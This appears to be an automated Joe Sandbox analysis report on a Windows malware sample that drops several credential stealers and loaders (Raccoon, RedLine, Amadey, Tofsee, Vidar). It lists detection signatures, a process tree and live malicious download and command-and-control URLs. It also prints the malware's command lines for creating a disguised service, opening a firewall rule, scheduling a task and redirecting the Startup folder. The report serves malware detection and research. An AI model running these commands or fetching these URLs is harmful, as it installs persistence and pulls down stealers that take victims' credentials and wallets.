Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report zmbGUZTICp.exe

Overview

General Information

Sample Name:zmbGUZTICp.exe
Analysis ID:553117
MD5:9af4d2022dc05c2dbbc4d218a8f0974c
SHA1:f87c7511d2c4ea4894603d3cfddd478c8c2b3ead
SHA256:c8fe81088b2caa9df35d92a588fb266a145c95b81b5c66d5bfe181fa73b17d82
Tags:exeRaccoonStealer
Infos:

Most interesting Screenshot:

Detection

Amadey Raccoon RedLine SmokeLoader Tofsee Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Amadeys stealer DLL
Detected unpacking (overwrites its own PE header)
Yara detected SmokeLoader
Yara detected Amadey bot
System process connects to network (likely due to code injection or exploit)
Yara detected Raccoon Stealer
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Sigma detected: Suspect Svchost Activity
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Yara detected Vidar stealer
Multi AV Scanner detection for domain / URL
Yara detected Tofsee
Sigma detected: Copying Sensitive Files with Credential Data
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Found evasive API chain (may stop execution after checking mutex)
Uses netsh to modify the Windows network and firewall settings
Tries to evade analysis by execution special instruction which cause usermode exception
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Sigma detected: Suspicious Svchost Process
Found evasive API chain (may stop execution after checking locale)
Contains functionality to inject code into remote processes
Deletes itself after installation
Tries to detect virtualization through RDTSC time measurements
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Found many strings related to Crypto-Wallets (likely being stolen)
Drops executables to the windows directory (C:\Windows) and starts them
Uses schtasks.exe or at.exe to add and modify task schedules
Checks if the current machine is a virtual machine (disk enumeration)
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
.NET source code references suspicious native API functions
Sigma detected: Suspicius Add Task From User AppData Temp
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
.NET source code contains method to dynamically call methods (often used by packers)
PE file has nameless sections
Machine Learning detection for dropped file
Modifies the windows firewall
Contains functionality to detect sleep reduction / modifications
Found evasive API chain (may stop execution after checking computer name)
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Modifies existing windows services
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Uses reg.exe to modify the Windows registry
Sigma detected: Netsh Port or Application Allowed
Found large amount of non-executed APIs
May check if the current machine is a sandbox (GetTickCount - Sleep)
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
PE file contains sections with non-standard names
Contains functionality to create guard pages, often used to hinder reverse usering and debugging
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Sigma detected: Direct Autorun Keys Modification
Contains functionality to communicate with device drivers
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
Entry point lies outside standard sections
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Connects to several IPs in different countries
Uses SMTP (mail sending)
Found evaded block containing many API calls
Queries disk information (often used to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • zmbGUZTICp.exe (PID: 4404 cmdline: "C:\Users\user\Desktop\zmbGUZTICp.exe" MD5: 9AF4D2022DC05C2DBBC4D218A8F0974C)
    • zmbGUZTICp.exe (PID: 3416 cmdline: "C:\Users\user\Desktop\zmbGUZTICp.exe" MD5: 9AF4D2022DC05C2DBBC4D218A8F0974C)
      • explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • 1E7F.exe (PID: 5200 cmdline: C:\Users\user\AppData\Local\Temp\1E7F.exe MD5: 277680BD3182EB0940BC356FF4712BEF)
          • WerFault.exe (PID: 5648 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5200 -s 520 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
        • 2DB3.exe (PID: 5640 cmdline: C:\Users\user\AppData\Local\Temp\2DB3.exe MD5: 6009BCB680BE6C0F656AA157E56423DC)
        • 309C.exe (PID: 5132 cmdline: C:\Users\user\AppData\Local\Temp\309C.exe MD5: 8B25D9317E18654C3F83EF8630D1DE16)
          • cmd.exe (PID: 852 cmdline: "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ozuqupbe\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 5820 cmdline: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\tejjnepq.exe" C:\Windows\SysWOW64\ozuqupbe\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 4636 cmdline: C:\Windows\System32\sc.exe" create ozuqupbe binPath= "C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exe /d\"C:\Users\user\AppData\Local\Temp\309C.exe\"" type= own start= auto DisplayName= "wifi support MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 3500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 5360 cmdline: C:\Windows\System32\sc.exe" description ozuqupbe "wifi internet conection MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 1360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 1148 cmdline: "C:\Windows\System32\sc.exe" start ozuqupbe MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 1352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • netsh.exe (PID: 5308 cmdline: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
            • conhost.exe (PID: 3532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • 3F71.exe (PID: 5196 cmdline: C:\Users\user\AppData\Local\Temp\3F71.exe MD5: D7DF01D8158BFADDC8BA48390E52F355)
          • 3F71.exe (PID: 1508 cmdline: C:\Users\user\AppData\Local\Temp\3F71.exe MD5: D7DF01D8158BFADDC8BA48390E52F355)
        • A7F0.exe (PID: 2200 cmdline: C:\Users\user\AppData\Local\Temp\A7F0.exe MD5: 852D86F5BC34BF4AF7FA89C60569DF13)
        • BC16.exe (PID: 2576 cmdline: C:\Users\user\AppData\Local\Temp\BC16.exe MD5: 8B239554FE346656C8EEF9484CE8092F)
          • mjlooy.exe (PID: 4660 cmdline: "C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe" MD5: 8B239554FE346656C8EEF9484CE8092F)
            • cmd.exe (PID: 5416 cmdline: "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\82aa4a6c48\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 4864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
              • reg.exe (PID: 3168 cmdline: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\82aa4a6c48\ MD5: CEE2A7E57DF2A159A065A34913A055C2)
            • schtasks.exe (PID: 4000 cmdline: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mjlooy.exe /TR "C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe" /F MD5: 15FF7D8324231381BAD48A052F85DF04)
              • conhost.exe (PID: 4636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • D452.exe (PID: 5572 cmdline: C:\Users\user\AppData\Local\Temp\D452.exe MD5: 5800952B83AECEFC3AA06CCB5B29A4C2)
          • AppLaunch.exe (PID: 5588 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe MD5: 6807F903AC06FF7E1670181378690B22)
        • 239.exe (PID: 5632 cmdline: C:\Users\user\AppData\Local\Temp\239.exe MD5: 5800952B83AECEFC3AA06CCB5B29A4C2)
          • AppLaunch.exe (PID: 2152 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe MD5: 6807F903AC06FF7E1670181378690B22)
        • 1D34.exe (PID: 2696 cmdline: C:\Users\user\AppData\Local\Temp\1D34.exe MD5: 852D86F5BC34BF4AF7FA89C60569DF13)
        • 2D04.exe (PID: 2896 cmdline: C:\Users\user\AppData\Local\Temp\2D04.exe MD5: 6ADB5470086099B9169109333FADAB86)
  • gdrgbdj (PID: 2468 cmdline: C:\Users\user\AppData\Roaming\gdrgbdj MD5: 9AF4D2022DC05C2DBBC4D218A8F0974C)
    • gdrgbdj (PID: 3492 cmdline: C:\Users\user\AppData\Roaming\gdrgbdj MD5: 9AF4D2022DC05C2DBBC4D218A8F0974C)
  • svchost.exe (PID: 5636 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • WerFault.exe (PID: 5668 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5200 -ip 5200 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • tejjnepq.exe (PID: 2320 cmdline: C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exe /d"C:\Users\user\AppData\Local\Temp\309C.exe" MD5: 310337FA2432C256984AA89486B74D95)
    • svchost.exe (PID: 4692 cmdline: svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
  • svchost.exe (PID: 5368 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5728 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • mjlooy.exe (PID: 2988 cmdline: C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe MD5: 8B239554FE346656C8EEF9484CE8092F)
  • mjlooy.exe (PID: 3916 cmdline: C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe MD5: 8B239554FE346656C8EEF9484CE8092F)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AmadeyYara detected Amadey botJoe Security
    dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      0000002E.00000002.664274182.00000000076A6000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000022.00000002.583256444.00000000000C2000.00000004.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          00000001.00000002.408517834.00000000005C1000.00000004.00020000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
            00000018.00000003.484958252.0000000000650000.00000004.00000001.sdmpJoeSecurity_TofseeYara detected TofseeJoe Security
              0000002E.00000002.636412165.0000000000402000.00000020.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                Click to see the 49 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                13.2.3F71.exe.370f910.1.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  28.0.3F71.exe.400000.12.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                    1.0.zmbGUZTICp.exe.400000.5.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                      11.3.309C.exe.660000.0.raw.unpackJoeSecurity_TofseeYara detected TofseeJoe Security
                        24.2.tejjnepq.exe.400000.0.unpackJoeSecurity_TofseeYara detected TofseeJoe Security
                          Click to see the 29 entries

                          Sigma Overview

                          System Summary:

                          barindex
                          Sigma detected: Suspect Svchost ActivityShow sources
                          Source: Process startedAuthor: David Burkett: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exe /d"C:\Users\user\AppData\Local\Temp\309C.exe", ParentImage: C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exe, ParentProcessId: 2320, ProcessCommandLine: svchost.exe, ProcessId: 4692
                          Sigma detected: Copying Sensitive Files with Credential DataShow sources
                          Source: Process startedAuthor: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\tejjnepq.exe" C:\Windows\SysWOW64\ozuqupbe\, CommandLine: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\tejjnepq.exe" C:\Windows\SysWOW64\ozuqupbe\, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\309C.exe, ParentImage: C:\Users\user\AppData\Local\Temp\309C.exe, ParentProcessId: 5132, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\tejjnepq.exe" C:\Windows\SysWOW64\ozuqupbe\, ProcessId: 5820
                          Sigma detected: Suspicious Svchost ProcessShow sources
                          Source: Process startedAuthor: Florian Roth: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exe /d"C:\Users\user\AppData\Local\Temp\309C.exe", ParentImage: C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exe, ParentProcessId: 2320, ProcessCommandLine: svchost.exe, ProcessId: 4692
                          Sigma detected: Suspicius Add Task From User AppData TempShow sources
                          Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mjlooy.exe /TR "C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe" /F, CommandLine: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mjlooy.exe /TR "C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe" /F, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe, ParentProcessId: 4660, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mjlooy.exe /TR "C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe" /F, ProcessId: 4000
                          Sigma detected: Netsh Port or Application AllowedShow sources
                          Source: Process startedAuthor: Markus Neis, Sander Wiebing: Data: Command: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, CommandLine: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, CommandLine|base64offset|contains: ijY, Image: C:\Windows\SysWOW64\netsh.exe, NewProcessName: C:\Windows\SysWOW64\netsh.exe, OriginalFileName: C:\Windows\SysWOW64\netsh.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\309C.exe, ParentImage: C:\Users\user\AppData\Local\Temp\309C.exe, ParentProcessId: 5132, ProcessCommandLine: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, ProcessId: 5308
                          Sigma detected: Direct Autorun Keys ModificationShow sources
                          Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\82aa4a6c48\, CommandLine: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\82aa4a6c48\, CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\82aa4a6c48\, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5416, ProcessCommandLine: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\82aa4a6c48\, ProcessId: 3168
                          Sigma detected: New Service CreationShow sources
                          Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\System32\sc.exe" create ozuqupbe binPath= "C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exe /d\"C:\Users\user\AppData\Local\Temp\309C.exe\"" type= own start= auto DisplayName= "wifi support, CommandLine: C:\Windows\System32\sc.exe" create ozuqupbe binPath= "C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exe /d\"C:\Users\user\AppData\Local\Temp\309C.exe\"" type= own start= auto DisplayName= "wifi support, CommandLine|base64offset|contains: r, Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\309C.exe, ParentImage: C:\Users\user\AppData\Local\Temp\309C.exe, ParentProcessId: 5132, ProcessCommandLine: C:\Windows\System32\sc.exe" create ozuqupbe binPath= "C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exe /d\"C:\Users\user\AppData\Local\Temp\309C.exe\"" type= own start= auto DisplayName= "wifi support, ProcessId: 4636

                          Jbx Signature Overview

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection:

                          barindex
                          Yara detected Raccoon StealerShow sources
                          Source: Yara matchFile source: 31.2.A7F0.exe.4d60e50.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 31.2.A7F0.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 31.3.A7F0.exe.4e00000.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 31.2.A7F0.exe.4d60e50.4.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 31.3.A7F0.exe.4e00000.3.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 31.2.A7F0.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000001F.00000002.640601105.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001F.00000002.662718681.0000000004D60000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001F.00000003.553585077.0000000004E00000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: A7F0.exe PID: 2200, type: MEMORYSTR
                          Antivirus detection for URL or domainShow sources
                          Source: http://185.163.45.70/capibarAvira URL Cloud: Label: phishing
                          Source: http://185.7.214.171:8080/6.phpURL Reputation: Label: malware
                          Source: http://data-host-coin-8.com/files/6961_1642089187_2359.exeAvira URL Cloud: Label: malware
                          Source: http://data-host-coin-8.com/files/8474_1641976243_3082.exeAvira URL Cloud: Label: malware
                          Source: http://unicupload.top/install5.exeURL Reputation: Label: phishing
                          Source: http://185.163.204.22/capibarAvira URL Cloud: Label: malware
                          Source: https://185.163.204.22/capibarAvira URL Cloud: Label: malware
                          Source: http://data-host-coin-8.com/files/7729_1642101604_1835.exeAvira URL Cloud: Label: malware
                          Source: http://data-host-coin-8.com/files/9030_1641816409_7037.exeAvira URL Cloud: Label: malware
                          Source: http://185.215.113.35/d2VxjasuwS/plugins/cred.dllAvira URL Cloud: Label: malware
                          Antivirus detection for dropped fileShow sources
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeAvira: detection malicious, Label: HEUR/AGEN.1211353
                          Multi AV Scanner detection for submitted fileShow sources
                          Source: zmbGUZTICp.exeVirustotal: Detection: 35%Perma Link
                          Source: zmbGUZTICp.exeReversingLabs: Detection: 41%
                          Multi AV Scanner detection for domain / URLShow sources
                          Source: http://185.163.45.70/capibarVirustotal: Detection: 11%Perma Link
                          Machine Learning detection for sampleShow sources
                          Source: zmbGUZTICp.exeJoe Sandbox ML: detected
                          Machine Learning detection for dropped fileShow sources
                          Source: C:\Users\user\AppData\Local\Temp\239.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\2D04.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\1E7F.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\1D34.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeJoe Sandbox ML: detected
                          Source: 24.3.tejjnepq.exe.650000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                          Source: 8.2.2DB3.exe.630e50.1.unpackAvira: Label: TR/Patched.Ren.Gen
                          Source: 24.2.tejjnepq.exe.400000.0.unpackAvira: Label: BDS/Backdoor.Gen
                          Source: 11.2.309C.exe.630e50.1.unpackAvira: Label: TR/Patched.Ren.Gen
                          Source: 31.3.A7F0.exe.4d10000.2.unpackAvira: Label: TR/Crypt.EPACK.Gen2
                          Source: 8.3.2DB3.exe.650000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                          Source: 27.2.svchost.exe.4d0000.0.unpackAvira: Label: BDS/Backdoor.Gen
                          Source: 11.3.309C.exe.660000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                          Source: 24.2.tejjnepq.exe.630e50.1.unpackAvira: Label: TR/Patched.Ren.Gen
                          Source: 24.2.tejjnepq.exe.ed0000.2.unpackAvira: Label: BDS/Backdoor.Gen
                          Source: 11.2.309C.exe.400000.0.unpackAvira: Label: BDS/Backdoor.Gen
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exeCode function: 8_2_00407470 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exeCode function: 8_2_00404830 memset,CryptStringToBinaryA,CryptStringToBinaryA,
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exeCode function: 8_2_00407510 CryptUnprotectData,LocalAlloc,LocalFree,
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exeCode function: 8_2_00407190 CryptUnprotectData,
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exeCode function: 8_2_004077A0 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,

                          Compliance:

                          barindex
                          Detected unpacking (overwrites its own PE header)Show sources
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exeUnpacked PE file: 8.2.2DB3.exe.400000.0.unpack
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeUnpacked PE file: 11.2.309C.exe.400000.0.unpack
                          Source: C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exeUnpacked PE file: 24.2.tejjnepq.exe.400000.0.unpack
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exeUnpacked PE file: 31.2.A7F0.exe.400000.0.unpack
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exeUnpacked PE file: 31.2.A7F0.exe.400000.0.unpack
                          Source: zmbGUZTICp.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                          Source: C:\Users\user\AppData\Local\Temp\1E7F.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                          Source: unknownHTTPS traffic detected: 185.233.81.115:443 -> 192.168.2.6:49703 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.6:49720 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.38.221:443 -> 192.168.2.6:49749 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.6:49751 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.6:49762 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.6:49772 version: TLS 1.2
                          Source: Binary string: C:\zazadix dori\kol.pdb source: 2DB3.exe, 00000008.00000000.453772125.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: C:\jixixahut\vovima50\zuwa\ficux93 lodedam pazuwisivovu\sewidel.pdb source: A7F0.exe, 0000001F.00000002.646423634.0000000002E20000.00000040.00000001.sdmp, A7F0.exe, 0000001F.00000003.532814882.0000000003020000.00000004.00000001.sdmp
                          Source: Binary string: msvcrt.pdbk source: WerFault.exe, 0000000C.00000003.473839952.0000000005420000.00000004.00000040.sdmp
                          Source: Binary string: shlwapi.pdb* source: WerFault.exe, 0000000C.00000003.473862153.0000000005427000.00000004.00000040.sdmp
                          Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000C.00000003.473821412.0000000005321000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.467405426.00000000032B6000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.467933513.00000000032B6000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.467565394.00000000032B6000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.467354885.000000000500A000.00000004.00000001.sdmp
                          Source: Binary string: Kernel.Appcore.pdb. source: WerFault.exe, 0000000C.00000003.473862153.0000000005427000.00000004.00000040.sdmp
                          Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000C.00000003.473821412.0000000005321000.00000004.00000001.sdmp
                          Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss3.pdb source: A7F0.exe, 0000001F.00000002.675040264.000000006BE60000.00000002.00020000.sdmp
                          Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000C.00000003.473839952.0000000005420000.00000004.00000040.sdmp
                          Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000C.00000003.473839952.0000000005420000.00000004.00000040.sdmp
                          Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000C.00000003.473821412.0000000005321000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.469360624.00000000032B0000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.467390023.00000000032B0000.00000004.00000001.sdmp
